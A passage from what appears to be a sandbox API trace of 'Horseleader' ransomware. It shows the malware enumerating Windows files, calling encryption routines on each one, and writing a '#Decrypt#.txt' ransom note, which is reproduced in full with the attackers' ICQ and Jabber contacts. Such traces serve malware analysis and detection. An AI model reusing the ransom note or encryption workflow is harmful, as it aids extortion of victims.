returned 0xffffffff [0230.278] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="mip.exe.mui", cAlternateFileName="")) returned 1 [0230.278] lstrcmpiW (lpString1="mip.exe.mui", lpString2="Windows") returned -1 [0230.278] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui") returned 72 [0230.278] StrStrIW (lpFirst="mip.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.278] lstrcmpW (lpString1="mip.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.278] lstrcmpW (lpString1="mip.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.278] lstrlenW (lpString=".testttjffg") returned 11 [0230.278] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.278] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.278] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.278] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mip.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mip.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.279] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="mshwLatin.dll.mui", cAlternateFileName="")) returned 1 [0230.279] lstrcmpiW (lpString1="mshwLatin.dll.mui", lpString2="Windows") returned -1 [0230.279] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui") returned 78 [0230.279] StrStrIW (lpFirst="mshwLatin.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.279] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.279] lstrcmpW (lpString1="mshwLatin.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.279] lstrlenW (lpString=".testttjffg") returned 11 [0230.279] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.279] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.279] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.279] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.302] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeca1847, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xf901a42, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xeca1847, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="rtscom.dll.mui", cAlternateFileName="")) returned 1 [0230.302] lstrcmpiW (lpString1="rtscom.dll.mui", lpString2="Windows") returned -1 [0230.302] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui") returned 75 [0230.302] StrStrIW (lpFirst="rtscom.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.302] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.302] lstrcmpW (lpString1="rtscom.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.302] lstrlenW (lpString=".testttjffg") returned 11 [0230.302] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.302] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.302] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="ShapeCollector.exe.mui", cAlternateFileName="")) returned 1 [0230.303] lstrcmpiW (lpString1="ShapeCollector.exe.mui", lpString2="Windows") returned -1 [0230.303] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui") returned 83 [0230.303] StrStrIW (lpFirst="ShapeCollector.exe.mui", lpSrch=".horseleader") returned 0x0 [0230.303] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="#Decrypt#.txt") returned 1 [0230.303] lstrcmpW (lpString1="ShapeCollector.exe.mui", lpString2="_uninstalling_.png") returned 1 [0230.303] lstrlenW (lpString=".testttjffg") returned 11 [0230.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui", lpSrch=".testttjffg") returned 0x0 [0230.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\ShapeCollector.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\shapecollector.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.303] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25c90f6, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x25c90f6, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5d08b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2f600, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="split.avi", cAlternateFileName="")) returned 1 [0230.303] lstrcmpiW (lpString1="split.avi", lpString2="Windows") returned -1 [0230.304] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi") returned 70 [0230.304] StrStrIW (lpFirst="split.avi", lpSrch=".horseleader") returned 0x0 [0230.304] lstrcmpW (lpString1="split.avi", lpString2="#Decrypt#.txt") returned 1 [0230.304] lstrcmpW (lpString1="split.avi", lpString2="_uninstalling_.png") returned 1 [0230.304] lstrlenW (lpString=".testttjffg") returned 11 [0230.304] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi", lpSrch=".testttjffg") returned 0x0 [0230.304] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.304] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.304] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\split.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\split.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.304] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa23a9ac, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xa5a884b, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xa23a9ac, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tabskb.dll.mui", cAlternateFileName="")) returned 1 [0230.304] lstrcmpiW (lpString1="tabskb.dll.mui", lpString2="Windows") returned -1 [0230.304] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui") returned 75 [0230.305] StrStrIW (lpFirst="tabskb.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.305] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.305] lstrcmpW (lpString1="tabskb.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.305] lstrlenW (lpString=".testttjffg") returned 11 [0230.305] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.305] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.305] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.305] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tabskb.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tabskb.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.321] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipBand.dll.mui", cAlternateFileName="")) returned 1 [0230.321] lstrcmpiW (lpString1="TipBand.dll.mui", lpString2="Windows") returned -1 [0230.321] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui") returned 76 [0230.321] StrStrIW (lpFirst="TipBand.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.321] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.321] lstrcmpW (lpString1="TipBand.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.321] lstrlenW (lpString=".testttjffg") returned 11 [0230.321] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.321] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.321] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.322] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipBand.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipband.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.566] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipRes.dll.mui", cAlternateFileName="")) returned 1 [0230.567] lstrcmpiW (lpString1="TipRes.dll.mui", lpString2="Windows") returned -1 [0230.567] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui") returned 75 [0230.567] StrStrIW (lpFirst="TipRes.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.567] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.567] lstrcmpW (lpString1="TipRes.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.567] lstrlenW (lpString=".testttjffg") returned 11 [0230.567] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.567] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.567] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.567] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipRes.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipres.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.567] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5cd75ed, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe5f38bbd, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe5f38bbd, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0230.569] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0230.569] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui") returned 76 [0230.569] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.569] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.569] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.569] lstrlenW (lpString=".testttjffg") returned 11 [0230.570] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.570] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.570] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.570] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.570] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 1 [0230.570] lstrcmpiW (lpString1="TipTsf.dll.mui", lpString2="Windows") returned -1 [0230.570] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui") returned 75 [0230.570] StrStrIW (lpFirst="TipTsf.dll.mui", lpSrch=".horseleader") returned 0x0 [0230.570] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0230.570] lstrcmpW (lpString1="TipTsf.dll.mui", lpString2="_uninstalling_.png") returned 1 [0230.570] lstrlenW (lpString=".testttjffg") returned 11 [0230.571] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui", lpSrch=".testttjffg") returned 0x0 [0230.571] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0230.571] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0230.571] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\TipTsf.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\tiptsf.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0230.571] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xc00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="TipTsf.dll.mui", cAlternateFileName="")) returned 0 [0230.571] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0230.818] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\#Decrypt#.txt") returned 74 [0230.818] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0230.820] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0230.820] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0230.821] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0230.821] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0230.821] CloseHandle (hObject=0x158) returned 1 [0230.822] GetProcessHeap () returned 0x780000 [0230.822] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0230.822] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, 